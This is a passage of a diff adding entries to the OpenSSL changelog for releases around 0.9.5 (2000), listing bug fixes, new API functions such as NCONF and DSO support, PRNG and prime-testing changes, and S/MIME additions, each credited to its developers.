+     [Steve Henson]
+
+  *) Implement SSL_OP_TLS_ROLLBACK_BUG: In ssl3_get_client_key_exchange, if
+     this option is set, tolerate broken clients that send the negotiated
+     protocol version number instead of the requested protocol version
+     number.
+     [Bodo Moeller]
+
+  *) Call dh_tmp_cb (set by ..._TMP_DH_CB) with correct 'is_export' flag;
+     i.e. non-zero for export ciphersuites, zero otherwise.
+     Previous versions had this flag inverted, inconsistent with
+     rsa_tmp_cb (..._TMP_RSA_CB).
+     [Bodo Moeller; problem reported by Amit Chopra]
+
+  *) Add missing DSA library text string. Work around for some IIS
+     key files with invalid SEQUENCE encoding.
+     [Steve Henson]
+
+  *) Add a document (doc/standards.txt) that list all kinds of standards
+     and so on that are implemented in OpenSSL.
+     [Richard Levitte]
+
+  *) Enhance c_rehash script. Old version would mishandle certificates
+     with the same subject name hash and wouldn't handle CRLs at all.
+     Added -fingerprint option to crl utility, to support new c_rehash
+     features.
+     [Steve Henson]
+
+  *) Eliminate non-ANSI declarations in crypto.h and stack.h.
+     [Ulf Möller]
+
+  *) Fix for SSL server purpose checking. Server checking was
+     rejecting certificates which had extended key usage present
+     but no ssl client purpose.
+     [Steve Henson, reported by Rene Grosser <grosser@hisolutions.com>]
+
+  *) Make PKCS#12 code work with no password. The PKCS#12 spec
+     is a little unclear about how a blank password is handled.
+     Since the password in encoded as a BMPString with terminating
+     double NULL a zero length password would end up as just the
+     double NULL. However no password at all is different and is
+     handled differently in the PKCS#12 key generation code. NS
+     treats a blank password as zero length. MSIE treats it as no
+     password on export: but it will try both on import. We now do
+     the same: PKCS12_parse() tries zero length and no password if
+     the password is set to "" or NULL (NULL is now a valid password:
+     it wasn't before) as does the pkcs12 application.
+     [Steve Henson]
+
+  *) Bugfixes in apps/x509.c: Avoid a memory leak; and don't use
+     perror when PEM_read_bio_X509_REQ fails, the error message must
+     be obtained from the error queue.
+     [Bodo Moeller]
+
+  *) Avoid 'thread_hash' memory leak in crypto/err/err.c by freeing
+     it in ERR_remove_state if appropriate, and change ERR_get_state
+     accordingly to avoid race conditions (this is necessary because
+     thread_hash is no longer constant once set).
+     [Bodo Moeller]
+
+  *) Bugfix for linux-elf makefile.one.
+     [Ulf Möller]
+
+  *) RSA_get_default_method() will now cause a default
+     RSA_METHOD to be chosen if one doesn't exist already.
+     Previously this was only set during a call to RSA_new()
+     or RSA_new_method(NULL) meaning it was possible for
+     RSA_get_default_method() to return NULL.
+     [Geoff Thorpe]
+
+  *) Added native name translation to the existing DSO code
+     that will convert (if the flag to do so is set) filenames
+     that are sufficiently small and have no path information
+     into a canonical native form. Eg. "blah" converted to
+     "libblah.so" or "blah.dll" etc.
+     [Geoff Thorpe]
+
+  *) New function ERR_error_string_n(e, buf, len) which is like
+     ERR_error_string(e, buf), but writes at most 'len' bytes
+     including the 0 terminator.  For ERR_error_string_n, 'buf'
+     may not be NULL.
+     [Damien Miller <djm@mindrot.org>, Bodo Moeller]
+
+  *) CONF library reworked to become more general.  A new CONF
+     configuration file reader "class" is implemented as well as a
+     new functions (NCONF_*, for "New CONF") to handle it.  The now
+     old CONF_* functions are still there, but are reimplemented to
+     work in terms of the new functions.  Also, a set of functions
+     to handle the internal storage of the configuration data is
+     provided to make it easier to write new configuration file
+     reader "classes" (I can definitely see something reading a
+     configuration file in XML format, for example), called _CONF_*,
+     or "the configuration storage API"...
+
+     The new configuration file reading functions are:
+
+        NCONF_new, NCONF_free, NCONF_load, NCONF_load_fp, NCONF_load_bio,
+        NCONF_get_section, NCONF_get_string, NCONF_get_numbre
+
+        NCONF_default, NCONF_WIN32
+
+        NCONF_dump_fp, NCONF_dump_bio
+
+     NCONF_default and NCONF_WIN32 are method (or "class") choosers,
+     NCONF_new creates a new CONF object.  This works in the same way
+     as other interfaces in OpenSSL, like the BIO interface.
+     NCONF_dump_* dump the internal storage of the configuration file,
+     which is useful for debugging.  All other functions take the same
+     arguments as the old CONF_* functions wth the exception of the
+     first that must be a `CONF *' instead of a `LHASH *'.
+
+     To make it easer to use the new classes with the old CONF_* functions,
+     the function CONF_set_default_method is provided.
+     [Richard Levitte]
+
+  *) Add '-tls1' option to 'openssl ciphers', which was already
+     mentioned in the documentation but had not been implemented.
+     (This option is not yet really useful because even the additional
+     experimental TLS 1.0 ciphers are currently treated as SSL 3.0 ciphers.)
+     [Bodo Moeller]
+
+  *) Initial DSO code added into libcrypto for letting OpenSSL (and
+     OpenSSL-based applications) load shared libraries and bind to
+     them in a portable way.
+     [Geoff Thorpe, with contributions from Richard Levitte]
+
+ Changes between 0.9.5 and 0.9.5a  [1 Apr 2000]
+
+  *) Make sure _lrotl and _lrotr are only used with MSVC.
+
+  *) Use lock CRYPTO_LOCK_RAND correctly in ssleay_rand_status
+     (the default implementation of RAND_status).
+
+  *) Rename openssl x509 option '-crlext', which was added in 0.9.5,
+     to '-clrext' (= clear extensions), as intended and documented.
+     [Bodo Moeller; inconsistency pointed out by Michael Attili
+     <attili@amaxo.com>]
+
+  *) Fix for HMAC. It wasn't zeroing the rest of the block if the key length
+     was larger than the MD block size.      
+     [Steve Henson, pointed out by Yost William <YostW@tce.com>]
+
+  *) Modernise PKCS12_parse() so it uses STACK_OF(X509) for its ca argument
+     fix a leak when the ca argument was passed as NULL. Stop X509_PUBKEY_set()
+     using the passed key: if the passed key was a private key the result
+     of X509_print(), for example, would be to print out all the private key
+     components.
+     [Steve Henson]
+
+  *) des_quad_cksum() byte order bug fix.
+     [Ulf Möller, using the problem description in krb4-0.9.7, where
+      the solution is attributed to Derrick J Brashear <shadow@DEMENTIA.ORG>]
+
+  *) Fix so V_ASN1_APP_CHOOSE works again: however its use is strongly
+     discouraged.
+     [Steve Henson, pointed out by Brian Korver <briank@cs.stanford.edu>]
+
+  *) For easily testing in shell scripts whether some command
+     'openssl XXX' exists, the new pseudo-command 'openssl no-XXX'
+     returns with exit code 0 iff no command of the given name is available.
+     'no-XXX' is printed in this case, 'XXX' otherwise.  In both cases,
+     the output goes to stdout and nothing is printed to stderr.
+     Additional arguments are always ignored.
+
+     Since for each cipher there is a command of the same name,
+     the 'no-cipher' compilation switches can be tested this way.
+
+     ('openssl no-XXX' is not able to detect pseudo-commands such
+     as 'quit', 'list-XXX-commands', or 'no-XXX' itself.)
+     [Bodo Moeller]
+
+  *) Update test suite so that 'make test' succeeds in 'no-rsa' configuration.
+     [Bodo Moeller]
+
+  *) For SSL_[CTX_]set_tmp_dh, don't create a DH key if SSL_OP_SINGLE_DH_USE
+     is set; it will be thrown away anyway because each handshake creates
+     its own key.
+     ssl_cert_dup, which is used by SSL_new, now copies DH keys in addition
+     to parameters -- in previous versions (since OpenSSL 0.9.3) the
+     'default key' from SSL_CTX_set_tmp_dh would always be lost, meanining
+     you effectivly got SSL_OP_SINGLE_DH_USE when using this macro.
+     [Bodo Moeller]
+
+  *) New s_client option -ign_eof: EOF at stdin is ignored, and
+     'Q' and 'R' lose their special meanings (quit/renegotiate).
+     This is part of what -quiet does; unlike -quiet, -ign_eof
+     does not suppress any output.
+     [Richard Levitte]
+
+  *) Add compatibility options to the purpose and trust code. The
+     purpose X509_PURPOSE_ANY is "any purpose" which automatically
+     accepts a certificate or CA, this was the previous behaviour,
+     with all the associated security issues.
+
+     X509_TRUST_COMPAT is the old trust behaviour: only and
+     automatically trust self signed roots in certificate store. A
+     new trust setting X509_TRUST_DEFAULT is used to specify that
+     a purpose has no associated trust setting and it should instead
+     use the value in the default purpose.
+     [Steve Henson]
+
+  *) Fix the PKCS#8 DSA private key code so it decodes keys again
+     and fix a memory leak.
+     [Steve Henson]
+
+  *) In util/mkerr.pl (which implements 'make errors'), preserve
+     reason strings from the previous version of the .c file, as
+     the default to have only downcase letters (and digits) in
+     automatically generated reasons codes is not always appropriate.
+     [Bodo Moeller]
+
+  *) In ERR_load_ERR_strings(), build an ERR_LIB_SYS error reason table
+     using strerror.  Previously, ERR_reason_error_string() returned
+     library names as reason strings for SYSerr; but SYSerr is a special
+     case where small numbers are errno values, not library numbers.
+     [Bodo Moeller]
+
+  *) Add '-dsaparam' option to 'openssl dhparam' application.  This
+     converts DSA parameters into DH parameters. (When creating parameters,
+     DSA_generate_parameters is used.)
+     [Bodo Moeller]
+
+  *) Include 'length' (recommended exponent length) in C code generated
+     by 'openssl dhparam -C'.
+     [Bodo Moeller]
+
+  *) The second argument to set_label in perlasm was already being used
+     so couldn't be used as a "file scope" flag. Moved to third argument
+     which was free.
+     [Steve Henson]
+
+  *) In PEM_ASN1_write_bio and some other functions, use RAND_pseudo_bytes
+     instead of RAND_bytes for encryption IVs and salts.
+     [Bodo Moeller]
+
+  *) Include RAND_status() into RAND_METHOD instead of implementing
+     it only for md_rand.c  Otherwise replacing the PRNG by calling
+     RAND_set_rand_method would be impossible.
+     [Bodo Moeller]
+
+  *) Don't let DSA_generate_key() enter an infinite loop if the random
+     number generation fails.
+     [Bodo Moeller]
+
+  *) New 'rand' application for creating pseudo-random output.
+     [Bodo Moeller]
+
+  *) Added configuration support for Linux/IA64
+     [Rolf Haberrecker <rolf@suse.de>]
+
+  *) Assembler module support for Mingw32.
+     [Ulf Möller]
+
+  *) Shared library support for HPUX (in shlib/).
+     [Lutz Jaenicke <Lutz.Jaenicke@aet.TU-Cottbus.DE> and Anonymous]
+
+  *) Shared library support for Solaris gcc.
+     [Lutz Behnke <behnke@trustcenter.de>]
+
+ Changes between 0.9.4 and 0.9.5  [28 Feb 2000]
+
+  *) PKCS7_encrypt() was adding text MIME headers twice because they
+     were added manually and by SMIME_crlf_copy().
+     [Steve Henson]
+
+  *) In bntest.c don't call BN_rand with zero bits argument.
+     [Steve Henson, pointed out by Andrew W. Gray <agray@iconsinc.com>]
+
+  *) BN_mul bugfix: In bn_mul_part_recursion() only the a>a[n] && b>b[n]
+     case was implemented. This caused BN_div_recp() to fail occasionally.
+     [Ulf Möller]
+
+  *) Add an optional second argument to the set_label() in the perl
+     assembly language builder. If this argument exists and is set
+     to 1 it signals that the assembler should use a symbol whose 
+     scope is the entire file, not just the current function. This
+     is needed with MASM which uses the format label:: for this scope.
+     [Steve Henson, pointed out by Peter Runestig <peter@runestig.com>]
+
+  *) Change the ASN1 types so they are typedefs by default. Before
+     almost all types were #define'd to ASN1_STRING which was causing
+     STACK_OF() problems: you couldn't declare STACK_OF(ASN1_UTF8STRING)
+     for example.
+     [Steve Henson]
+
+  *) Change names of new functions to the new get1/get0 naming
+     convention: After 'get1', the caller owns a reference count
+     and has to call ..._free; 'get0' returns a pointer to some
+     data structure without incrementing reference counters.
+     (Some of the existing 'get' functions increment a reference
+     counter, some don't.)
+     Similarly, 'set1' and 'add1' functions increase reference
+     counters or duplicate objects.
+     [Steve Henson]
+
+  *) Allow for the possibility of temp RSA key generation failure:
+     the code used to assume it always worked and crashed on failure.
+     [Steve Henson]
+
+  *) Fix potential buffer overrun problem in BIO_printf().
+     [Ulf Möller, using public domain code by Patrick Powell; problem
+      pointed out by David Sacerdote <das33@cornell.edu>]
+
+  *) Support EGD <http://www.lothar.com/tech/crypto/>.  New functions
+     RAND_egd() and RAND_status().  In the command line application,
+     the EGD socket can be specified like a seed file using RANDFILE
+     or -rand.
+     [Ulf Möller]
+
+  *) Allow the string CERTIFICATE to be tolerated in PKCS#7 structures.
+     Some CAs (e.g. Verisign) distribute certificates in this form.
+     [Steve Henson]
+
+  *) Remove the SSL_ALLOW_ADH compile option and set the default cipher
+     list to exclude them. This means that no special compilation option
+     is needed to use anonymous DH: it just needs to be included in the
+     cipher list.
+     [Steve Henson]
+
+  *) Change the EVP_MD_CTX_type macro so its meaning consistent with
+     EVP_MD_type. The old functionality is available in a new macro called
+     EVP_MD_md(). Change code that uses it and update docs.
+     [Steve Henson]
+
+  *) ..._ctrl functions now have corresponding ..._callback_ctrl functions
+     where the 'void *' argument is replaced by a function pointer argument.
+     Previously 'void *' was abused to point to functions, which works on
+     many platforms, but is not correct.  As these functions are usually
+     called by macros defined in OpenSSL header files, most source code
+     should work without changes.
+     [Richard Levitte]
+
+  *) <openssl/opensslconf.h> (which is created by Configure) now contains
+     sections with information on -D... compiler switches used for
+     compiling the library so that applications can see them.  To enable
+     one of these sections, a pre-processor symbol OPENSSL_..._DEFINES
+     must be defined.  E.g.,
+        #define OPENSSL_ALGORITHM_DEFINES
+        #include <openssl/opensslconf.h>
+     defines all pertinent NO_<algo> symbols, such as NO_IDEA, NO_RSA, etc.
+     [Richard Levitte, Ulf and Bodo Möller]
+
+  *) Bugfix: Tolerate fragmentation and interleaving in the SSL 3/TLS
+     record layer.
+     [Bodo Moeller]
+
+  *) Change the 'other' type in certificate aux info to a STACK_OF
+     X509_ALGOR. Although not an AlgorithmIdentifier as such it has
+     the required ASN1 format: arbitrary types determined by an OID.
+     [Steve Henson]
+
+  *) Add some PEM_write_X509_REQ_NEW() functions and a command line
+     argument to 'req'. This is not because the function is newer or
+     better than others it just uses the work 'NEW' in the certificate
+     request header lines. Some software needs this.
+     [Steve Henson]
+
+  *) Reorganise password command line arguments: now passwords can be
+     obtained from various sources. Delete the PEM_cb function and make
+     it the default behaviour: i.e. if the callback is NULL and the
+     usrdata argument is not NULL interpret it as a null terminated pass
+     phrase. If usrdata and the callback are NULL then the pass phrase
+     is prompted for as usual.
+     [Steve Henson]
+
+  *) Add support for the Compaq Atalla crypto accelerator. If it is installed,
+     the support is automatically enabled. The resulting binaries will
+     autodetect the card and use it if present.
+     [Ben Laurie and Compaq Inc.]
+
+  *) Work around for Netscape hang bug. This sends certificate request
+     and server done in one record. Since this is perfectly legal in the
+     SSL/TLS protocol it isn't a "bug" option and is on by default. See
+     the bugs/SSLv3 entry for more info.
+     [Steve Henson]
+
+  *) HP-UX tune-up: new unified configs, HP C compiler bug workaround.
+     [Andy Polyakov]
+
+  *) Add -rand argument to smime and pkcs12 applications and read/write
+     of seed file.
+     [Steve Henson]
+
+  *) New 'passwd' tool for crypt(3) and apr1 password hashes.
+     [Bodo Moeller]
+
+  *) Add command line password options to the remaining applications.
+     [Steve Henson]
+
+  *) Bug fix for BN_div_recp() for numerators with an even number of
+     bits.
+     [Ulf Möller]
+
+  *) More tests in bntest.c, and changed test_bn output.
+     [Ulf Möller]
+
+  *) ./config recognizes MacOS X now.
+     [Andy Polyakov]
+
+  *) Bug fix for BN_div() when the first words of num and divsor are
+     equal (it gave wrong results if (rem=(n1-q*d0)&BN_MASK2) < d0).
+     [Ulf Möller]
+
+  *) Add support for various broken PKCS#8 formats, and command line
+     options to produce them.
+     [Steve Henson]
+
+  *) New functions BN_CTX_start(), BN_CTX_get() and BT_CTX_end() to
+     get temporary BIGNUMs from a BN_CTX.
+     [Ulf Möller]
+
+  *) Correct return values in BN_mod_exp_mont() and BN_mod_exp2_mont()
+     for p == 0.
+     [Ulf Möller]
+
+  *) Change the SSLeay_add_all_*() functions to OpenSSL_add_all_*() and
+     include a #define from the old name to the new. The original intent
+     was that statically linked binaries could for example just call
+     SSLeay_add_all_ciphers() to just add ciphers to the table and not
+     link with digests. This never worked becayse SSLeay_add_all_digests()
+     and SSLeay_add_all_ciphers() were in the same source file so calling
+     one would link with the other. They are now in separate source files.
+     [Steve Henson]
+
+  *) Add a new -notext option to 'ca' and a -pubkey option to 'spkac'.
+     [Steve Henson]
+
+  *) Use a less unusual form of the Miller-Rabin primality test (it used
+     a binary algorithm for exponentiation integrated into the Miller-Rabin
+     loop, our standard modexp algorithms are faster).
+     [Bodo Moeller]
+
+  *) Support for the EBCDIC character set completed.
+     [Martin Kraemer <Martin.Kraemer@Mch.SNI.De>]
+
+  *) Source code cleanups: use const where appropriate, eliminate casts,
+     use void * instead of char * in lhash.
+     [Ulf Möller] 
+
+  *) Bugfix: ssl3_send_server_key_exchange was not restartable
+     (the state was not changed to SSL3_ST_SW_KEY_EXCH_B, and because of
+     this the server could overwrite ephemeral keys that the client
+     has already seen).
+     [Bodo Moeller]
+
+  *) Turn DSA_is_prime into a macro that calls BN_is_prime,
+     using 50 iterations of the Rabin-Miller test.
+
+     DSA_generate_parameters now uses BN_is_prime_fasttest (with 50
+     iterations of the Rabin-Miller test as required by the appendix
+     to FIPS PUB 186[-1]) instead of DSA_is_prime.
+     As BN_is_prime_fasttest includes trial division, DSA parameter
+     generation becomes much faster.
+
+     This implies a change for the callback functions in DSA_is_prime
+     and DSA_generate_parameters: The callback function is called once
+     for each positive witness in the Rabin-Miller test, not just
+     occasionally in the inner loop; and the parameters to the
+     callback function now provide an iteration count for the outer
+     loop rather than for the current invocation of the inner loop.
+     DSA_generate_parameters additionally can call the callback
+     function with an 'iteration count' of -1, meaning that a
+     candidate has passed the trial division test (when q is generated 
+     from an application-provided seed, trial division is skipped).
+     [Bodo Moeller]
+
+  *) New function BN_is_prime_fasttest that optionally does trial
+     division before starting the Rabin-Miller test and has
+     an additional BN_CTX * argument (whereas BN_is_prime always
+     has to allocate at least one BN_CTX).
+     'callback(1, -1, cb_arg)' is called when a number has passed the
+     trial division stage.
+     [Bodo Moeller]
+
+  *) Fix for bug in CRL encoding. The validity dates weren't being handled
+     as ASN1_TIME.
+     [Steve Henson]
+
+  *) New -pkcs12 option to CA.pl script to write out a PKCS#12 file.
+     [Steve Henson]
+
+  *) New function BN_pseudo_rand().
+     [Ulf Möller]
+
+  *) Clean up BN_mod_mul_montgomery(): replace the broken (and unreadable)
+     bignum version of BN_from_montgomery() with the working code from
+     SSLeay 0.9.0 (the word based version is faster anyway), and clean up
+     the comments.
+     [Ulf Möller]
+
+  *) Avoid a race condition in s2_clnt.c (function get_server_hello) that
+     made it impossible to use the same SSL_SESSION data structure in
+     SSL2 clients in multiple threads.
+     [Bodo Moeller]
+
+  *) The return value of RAND_load_file() no longer counts bytes obtained
+     by stat().  RAND_load_file(..., -1) is new and uses the complete file
+     to seed the PRNG (previously an explicit byte count was required).
+     [Ulf Möller, Bodo Möller]
+
+  *) Clean up CRYPTO_EX_DATA functions, some of these didn't have prototypes
+     used (char *) instead of (void *) and had casts all over the place.
+     [Steve Henson]
+
+  *) Make BN_generate_prime() return NULL on error if ret!=NULL.
+     [Ulf Möller]
+
+  *) Retain source code compatibility for BN_prime_checks macro:
+     BN_is_prime(..., BN_prime_checks, ...) now uses
+     BN_prime_checks_for_size to determine the appropriate number of
+     Rabin-Miller iterations.
+     [Ulf Möller]
+
+  *) Diffie-Hellman uses "safe" primes: DH_check() return code renamed to
+     DH_CHECK_P_NOT_SAFE_PRIME.
+     (Check if this is true? OpenPGP calls them "strong".)
+     [Ulf Möller]
+
+  *) Merge the functionality of "dh" and "gendh" programs into a new program
+     "dhparam". The old programs are retained for now but will handle DH keys
+     (instead of parameters) in future.
+     [Steve Henson]
+
+  *) Make the ciphers, s_server and s_client programs check the return values
+     when a new cipher list is set.
+     [Steve Henson]
+
+  *) Enhance the SSL/TLS cipher mechanism to correctly handle the TLS 56bit
+     ciphers. Before when the 56bit ciphers were enabled the sorting was
+     wrong.
+
+     The syntax for the cipher sorting has been extended to support sorting by
+     cipher-strength (using the strength_bits hard coded in the tables).
+     The new command is "@STRENGTH" (see also doc/apps/ciphers.pod).
+
+     Fix a bug in the cipher-command parser: when supplying a cipher command
+     string with an "undefined" symbol (neither command nor alphanumeric
+     [A-Za-z0-9], ssl_set_cipher_list used to hang in an endless loop. Now
+     an error is flagged.
+
+     Due to the strength-sorting extension, the code of the
+     ssl_create_cipher_list() function was completely rearranged. I hope that
+     the readability was also increased :-)
+     [Lutz Jaenicke <Lutz.Jaenicke@aet.TU-Cottbus.DE>]
+
+  *) Minor change to 'x509' utility. The -CAcreateserial option now uses 1
+     for the first serial number and places 2 in the serial number file. This
+     avoids problems when the root CA is created with serial number zero and
+     the first user certificate has the same issuer name and serial number
+     as the root CA.
+     [Steve Henson]
+
+  *) Fixes to X509_ATTRIBUTE utilities, change the 'req' program so it uses
+     the new code. Add documentation for this stuff.
+     [Steve Henson]
+
+  *) Changes to X509_ATTRIBUTE utilities. These have been renamed from
+     X509_*() to X509at_*() on the grounds that they don't handle X509
+     structures and behave in an analagous way to the X509v3 functions:
+     they shouldn't be called directly but wrapper functions should be used
+     instead.
+
+     So we also now have some wrapper functions that call the X509at functions
+     when passed certificate requests. (TO DO: similar things can be done with
+     PKCS#7 signed and unsigned attributes, PKCS#12 attributes and a few other
+     things. Some of these need some d2i or i2d and print functionality
+     because they handle more complex structures.)
+     [Steve Henson]
+
+  *) Add missing #ifndefs that caused missing symbols when building libssl
+     as a shared library without RSA.  Use #ifndef NO_SSL2 instead of
+     NO_RSA in ssl/s2*.c. 
+     [Kris Kennaway <kris@hub.freebsd.org>, modified by Ulf Möller]
+
+  *) Precautions against using the PRNG uninitialized: RAND_bytes() now
+     has a return value which indicates the quality of the random data
+     (1 = ok, 0 = not seeded).  Also an error is recorded on the thread's
+     error queue. New function RAND_pseudo_bytes() generates output that is
+     guaranteed to be unique but not unpredictable. RAND_add is like
+     RAND_seed, but takes an extra argument for an entropy estimate
+     (RAND_seed always assumes full entropy).
+     [Ulf Möller]
+
+  *) Do more iterations of Rabin-Miller probable prime test (specifically,
+     3 for 1024-bit primes, 6 for 512-bit primes, 12 for 256-bit primes
+     instead of only 2 for all lengths; see BN_prime_checks_for_size definition
+     in crypto/bn/bn_prime.c for the complete table).  This guarantees a
+     false-positive rate of at most 2^-80 for random input.
+     [Bodo Moeller]
+
+  *) Rewrite ssl3_read_n (ssl/s3_pkt.c) avoiding a couple of bugs.
+     [Bodo Moeller]
+
+  *) New function X509_CTX_rget_chain() (renamed to X509_CTX_get1_chain
+     in the 0.9.5 release), this returns the chain
+     from an X509_CTX structure with a dup of the stack and all
+     the X509 reference counts upped: so the stack will exist
+     after X509_CTX_cleanup() has been called. Modify pkcs12.c
+     to use this.
+
+     Also make SSL_SESSION_print() print out the verify return
+     code.
+     [Steve Henson]
+
+  *) Add manpage for the pkcs12 command. Also change the default
+     behaviour so MAC iteration counts are used unless the new
+     -nomaciter option is used. This improves file security and
+     only older versions of MSIE (4.0 for example) need it.
+     [Steve Henson]
+
+  *) Honor the no-xxx Configure options when creating .DEF files.
+     [Ulf Möller]
+
+  *) Add PKCS#10 attributes to field table: challengePassword, 
+     unstructuredName and unstructuredAddress. These are taken from
+     draft PKCS#9 v2.0 but are compatible with v1.2 provided no 
+     international characters are used.
+
+     More changes to X509_ATTRIBUTE code: allow the setting of types
+     based on strings. Remove the 'loc' parameter when adding
+     attributes because these will be a SET OF encoding which is sorted
+     in ASN1 order.
+     [Steve Henson]
+
+  *) Initial changes to the 'req' utility to allow request generation
+     automation. This will allow an application to just generate a template
+     file containing all the field values and have req construct the
+     request.
+
+     Initial support for X509_ATTRIBUTE handling. Stacks of these are
+     used all over the place including certificate requests and PKCS#7
+     structures. They are currently handled manually where necessary with
+     some primitive wrappers for PKCS#7. The new functions behave in a
+     manner analogous to the X509 extension functions: they allow
+     attributes to be looked up by NID and added.
+
+     Later something similar to the X509V3 code would be desirable to
+     automatically handle the encoding, decoding and printing of the
+     more complex types. The string types like challengePassword can
+     be handled by the string table functions.
+
+     Also modified the multi byte string table handling. Now there is
+     a 'global mask' which masks out certain types. The table itself
+     can use the flag STABLE_NO_MASK to ignore the mask setting: this
+     is useful when for example there is only one permissible type
+     (as in countryName) and using the mask might result in no valid
+     types at all.
+     [Steve Henson]
+
+  *) Clean up 'Finished' handling, and add functions SSL_get_finished and
+     SSL_get_peer_finished to allow applications to obtain the latest
+     Finished messages sent to the peer or expected from the peer,
+     respectively.  (SSL_get_peer_finished is usually the Finished message
+     actually received from the peer, otherwise the protocol will be aborted.)
+
+     As the Finished message are message digests of the complete handshake
+     (with a total of 192 bits for TLS 1.0 and more for SSL 3.0), they can
+     be used for external authentication procedures when the authentication
+     provided by SSL/TLS is not desired or is not enough.
+     [Bodo Moeller]
+
+  *) Enhanced support for Alpha Linux is added. Now ./config checks if
+     the host supports BWX extension and if Compaq C is present on the
+     $PATH. Just exploiting of the BWX extension results in 20-30%
+     performance kick for some algorithms, e.g. DES and RC4 to mention
+     a couple. Compaq C in turn generates ~20% faster code for MD5 and
+     SHA1.
+     [Andy Polyakov]
+
+  *) Add support for MS "fast SGC". This is arguably a violation of the
+     SSL3/TLS protocol. Netscape SGC does two handshakes: the first with
+     weak crypto and after checking the certificate is SGC a second one
+     with strong crypto. MS SGC stops the first handshake after receiving
+     the server certificate message and sends a second client hello. Since
+     a server will typically do all the time consuming operations before
+     expecting any further messages from the client (server key exchange
+     is the most expensive) there is little difference between the two.
+
+     To get OpenSSL to support MS SGC we have to permit a second client
+     hello message after we have sent server done. In addition we have to
+     reset the MAC if we do get this second client hello.
+     [Steve Henson]
+
+  *) Add a function 'd2i_AutoPrivateKey()' this will automatically decide
+     if a DER encoded private key is RSA or DSA traditional format. Changed
+     d2i_PrivateKey_bio() to use it. This is only needed for the "traditional"
+     format DER encoded private key. Newer code should use PKCS#8 format which
+     has the key type encoded in the ASN1 structure. Added DER private key
+     support to pkcs8 application.
+     [Steve Henson]
+
+  *) SSL 3/TLS 1 servers now don't request certificates when an anonymous
+     ciphersuites has been selected (as required by the SSL 3/TLS 1
+     specifications).  Exception: When SSL_VERIFY_FAIL_IF_NO_PEER_CERT
+     is set, we interpret this as a request to violate the specification
+     (the worst that can happen is a handshake failure, and 'correct'
+     behaviour would result in a handshake failure anyway).
+     [Bodo Moeller]
+
+  *) In SSL_CTX_add_session, take into account that there might be multiple
+     SSL_SESSION structures with the same session ID (e.g. when two threads
+     concurrently obtain them from an external cache).
+     The internal cache can handle only one SSL_SESSION with a given ID,
+     so if there's a conflict, we now throw out the old one to achieve
+     consistency.
+     [Bodo Moeller]
+
+  *) Add OIDs for idea and blowfish in CBC mode. This will allow both
+     to be used in PKCS#5 v2.0 and S/MIME.  Also add checking to
+     some routines that use cipher OIDs: some ciphers do not have OIDs
+     defined and so they cannot be used for S/MIME and PKCS#5 v2.0 for
+     example.
+     [Steve Henson]
+
+  *) Simplify the trust setting structure and code. Now we just have
+     two sequences of OIDs for trusted and rejected settings. These will
+     typically have values the same as the extended key usage extension
+     and any application specific purposes.
+
+     The trust checking code now has a default behaviour: it will just
+     check for an object with the same NID as the passed id. Functions can
+     be provided to override either the default behaviour or the behaviour
+     for a given id. SSL client, server and email already have functions
+     in place for compatibility: they check the NID and also return "trusted"
+     if the certificate is self signed.
+     [Steve Henson]
+
+  *) Add d2i,i2d bio/fp functions for PrivateKey: these convert the
+     traditional format into an EVP_PKEY structure.
+     [Steve Henson]
+
+  *) Add a password callback function PEM_cb() which either prompts for
+     a password if usr_data is NULL or otherwise assumes it is a null
+     terminated password. Allow passwords to be passed on command line
+     environment or config files in a few more utilities.
+     [Steve Henson]
+
+  *) Add a bunch of DER and PEM functions to handle PKCS#8 format private
+     keys. Add some short names for PKCS#8 PBE algorithms and allow them
+     to be specified on the command line for the pkcs8 and pkcs12 utilities.
+     Update documentation.
+     [Steve Henson]
+
+  *) Support for ASN1 "NULL" type. This could be handled before by using
+     ASN1_TYPE but there wasn't any function that would try to read a NULL
+     and produce an error if it couldn't. For compatibility we also have
+     ASN1_NULL_new() and ASN1_NULL_free() functions but these are faked and
+     don't allocate anything because they don't need to.
+     [Steve Henson]
+
+  *) Initial support for MacOS is now provided. Examine INSTALL.MacOS
+     for details.
+     [Andy Polyakov, Roy Woods <roy@centicsystems.ca>]
+
+  *) Rebuild of the memory allocation routines used by OpenSSL code and
+     possibly others as well.  The purpose is to make an interface that
+     provide hooks so anyone can build a separate set of allocation and
+     deallocation routines to be used by OpenSSL, for example memory
+     pool implementations, or something else, which was previously hard
+     since Malloc(), Realloc() and Free() were defined as macros having
+     the values malloc, realloc and free, respectively (except for Win32
+     compilations).  The same is provided for memory debugging code.
+     OpenSSL already comes with functionality to find memory leaks, but
+     this gives people a chance to debug other memory problems.
+
+     With these changes, a new set of functions and macros have appeared:
+
+       CRYPTO_set_mem_debug_functions()	        [F]
+       CRYPTO_get_mem_debug_functions()         [F]
+       CRYPTO_dbg_set_options()	                [F]
+       CRYPTO_dbg_get_options()                 [F]
+       CRYPTO_malloc_debug_init()               [M]
+
+     The memory debug functions are NULL by default, unless the library
+     is compiled with CRYPTO_MDEBUG or friends is defined.  If someone
+     wants to debug memory anyway, CRYPTO_malloc_debug_init() (which
+     gives the standard debugging functions that come with OpenSSL) or
+     CRYPTO_set_mem_debug_functions() (tells OpenSSL to use functions
+     provided by the library user) must be used.  When the standard
+     debugging functions are used, CRYPTO_dbg_set_options can be used to
+     request additional information:
+     CRYPTO_dbg_set_options(V_CYRPTO_MDEBUG_xxx) corresponds to setting
+     the CRYPTO_MDEBUG_xxx macro when compiling the library.   
+
+     Also, things like CRYPTO_set_mem_functions will always give the
+     expected result (the new set of functions is used for allocation
+     and deallocation) at all times, regardless of platform and compiler
+     options.
+
+     To finish it up, some functions that were never use in any other
+     way than through macros have a new API and new semantic:
+
+       CRYPTO_dbg_malloc()
+       CRYPTO_dbg_realloc()
+       CRYPTO_dbg_free()
+
+     All macros of value have retained their old syntax.
+     [Richard Levitte and Bodo Moeller]
+
+  *) Some S/MIME fixes. The OID for SMIMECapabilities was wrong, the
+     ordering of SMIMECapabilities wasn't in "strength order" and there
+     was a missing NULL in the AlgorithmIdentifier for the SHA1 signature
+     algorithm.
+     [Steve Henson]
+
+  *) Some ASN1 types with illegal zero length encoding (INTEGER,
+     ENUMERATED and OBJECT IDENTIFIER) choked the ASN1 routines.
+     [Frans Heymans <fheymans@isaserver.be>, modified by Steve Henson]
+
+  *) Merge in my S/MIME library for OpenSSL. This provides a simple
+     S/MIME API on top of the PKCS#7 code, a MIME parser (with enough
+     functionality to handle multipart/signed properly) and a utility
+     called 'smime' to call all this stuff. This is based on code I
+     originally wrote for Celo who have kindly allowed it to be
+     included in OpenSSL.
+     [Steve Henson]
+
